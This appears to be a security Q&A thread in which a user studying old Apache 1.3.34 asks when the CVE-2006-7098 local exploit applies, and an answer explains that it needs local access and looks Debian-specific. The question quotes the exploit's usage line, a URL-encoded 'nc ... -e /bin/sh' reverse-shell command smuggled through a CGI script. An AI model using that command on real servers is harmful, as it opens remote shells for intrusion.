# When can the exploit for CVE: 2006-7098 be used?

Tags: linux, attacks, access-control, apache

I'm studying the vulnerabilities of an old version of Apache, the 1.3.34. And I don't quite understand in what exact situation the CVE 2006-7098 vulnerability can be exploited. The [*README*](https://www.exploit-db.com/exploits/3384/) included in the exploit states that:

> Local attacker can influence Apache to direct commands
>       into an open tty owned by user who started apache process, usually root.
>       This results in arbitrary command execution. Notes: Must have CGI execution privileges and service started manually by root via shell.
>
> Usage: *nc -vvv -l -p 31337
>       http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d*

At the beginning I understood that the vulnerability could be exploited from another machine in the same network of the vulnerable server. So from this other machine (attacker) I:

- compiled the cgipwn exploit and installed it in the cgi-bin of the
  attacker machine apache.
- executed the nc command from the attacker machine specifying -p as the port where the attacker apache listens to, *webserver* as the attacker machine IP and *myhost* as the server with the vulnerability.

But I've not succeeded: the command just doesn't return anything.

So, after rereading the exploit info several times, I've certain doubts about the phrase *local attacker*: does it mean that the vulnerability can only be exploited from the same machine where the vulnerable Apache is running? In that case I understand that the attacker should have a priori the credentials of a valid user in the machine with permissions to manage the apache (which would reduce quite a lot the applicability of the attack).

Could any body shed some light on this?

Answer (score 2, accepted):

"Local attacker" means local to the machine. The [official CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7098) states "local users" which is even more specific. Futhermore, this looks like a Debian-only (perhaps systems build on Debian as well) issue. It also looks like this problem was the result of applying a patch to Apache. So you'll need the right version of Apache as well.

Of course, the right solution is to use a supported version of Apache and apply all security patches promptly.